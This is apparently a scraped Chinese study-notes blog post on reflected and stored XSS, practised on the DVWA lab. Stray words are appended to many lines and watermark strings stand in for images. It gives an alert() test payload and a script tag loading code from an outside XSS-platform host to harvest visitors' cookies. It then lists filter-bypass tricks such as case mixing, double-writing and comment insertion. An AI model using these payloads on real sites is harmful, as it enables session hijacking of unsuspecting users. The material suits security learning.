第二轮学习笔记: XSS跨站脚本漏洞

扎头发,两圈太松,三圈太紧,洗澡,往左一点烫死,往右一点冻死,吃泡面,一桶吃不饱,两桶吃不完,就像咱们的关系。。。web

----  网易云热评安全

 

跨站脚本***(XSS),恶意***者在web页面插入恶意script代码,当用户浏览该页面时,恶意代码就会被执行,达到***用户的目的。cookie

造成缘由:程序对输入和输出的过滤不严格xss

1、反射型XSS:须要欺骗用户本身点击连接才能出发XSS代码ide

一、在输入窗口输入123,点击提交,审查元素,能够看到提交的内容显示在了网页工具

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

二、在输入框输入:<script>alert('123')</script>,点击提交,弹出对话框,说明存在漏洞web安全

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

2、漏洞利用blog

一、找一个xss平台,注册帐号,新建一个项目ip

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

 

 

 

二、复制关键代码:<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,将该代码复制到存在漏洞的页面,而后提交it

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

 

三、打开xss平台上建立的项目,咱们能够获得DVWA平台登陆的cookie

 

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

 

3、存储型XSS:用户只要访问存在该漏洞的页面就会触发

一、在对话框输入<script>alert('123')</script>,提交,每次刷新页面都会弹出,说明该处存在xss漏洞

 

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

 

二、在对话框输入xss平台上生成的代码<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,点击提交,只要访问该页面的用户,都会在xss平台上看到他的cookie信息

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

4、xss绕过

一、大小写绕过,将<script>修改成<ScRipt>

二、双写绕过,将<script>修改成<Sc<script>Ript>

三、注释绕过,将<script>修改成<scri<!--aaa--->pt>

四、实体转换,将&改成&amp,将<改成&lt,将>改成&gt等等

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

相关文章
相关标签/搜索